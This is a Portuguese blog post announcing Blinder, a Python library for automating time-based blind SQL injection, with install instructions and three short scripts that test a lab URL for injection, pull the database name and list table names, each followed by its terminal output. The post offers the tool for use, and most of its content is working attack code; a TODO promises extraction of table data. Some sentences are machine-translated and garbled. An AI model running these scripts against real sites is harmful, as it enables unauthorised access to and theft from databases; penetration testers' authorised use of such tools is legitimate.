Browse By

Blinder – Uma biblioteca Python para automatizar a injeção SQL

O Blidner é uma pequena biblioteca python para automatizar a injeção SQL com base no tempo , usando consultas predefinidas como funções para automatizar um rápido desenvolvimento de PoC.

Instalação:
Você pode instalar o Blinder usando o seguinte comando:
pip install blinder
Ou baixando a fonte e importando-a manualmente para o seu projeto.

Uso:
Para usarBlindero Blinder,você precisa importar omódulo e começar a usar as principais funções do Blinder.
Você pode usar o Blinder “com a versão atual” para fazer o seguinte:

  • Verifique se há injeção baseada no tempo.
  • Obtenha o nome do banco de dados.
  • Obter nomes de tabelas.

Você pode verificar a injeção em uma URL usando o seguinte código:

#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print blind.check_injection()

O resultado da execução será:

[email protected]:~/Desktop# python check.py
True
[email protected]:~/Desktop#

Você pode obter o nome do banco de dados usando o seguinte código:

#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print "Database name is : %s " % blind.get_database()

E os resultados serão:

[email protected]:~/Desktop# python get-database.py
Database name is : db1
[email protected]:~/Desktop#

Para obter nomes de tabelas, você pode usar o seguinte código:

#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

tables = blind.get_tables()

for table in tables:
    print table

E os resultados serão:

[email protected]:~/Desktop# python get-tables.py
blogs
notes
[email protected]:~/Desktop#

TODO
Muitos recursos devem ser adicionados em breve, como:

  • a capacidade de adicionar consulta personalizada
  • pontos de injeção de teste com base na solicitação de arroto
  • extrair dados de tabelas / colunas

Baixar Blinder

Deixe uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *

Este site utiliza o Akismet para reduzir spam. Fica a saber como são processados os dados dos comentários.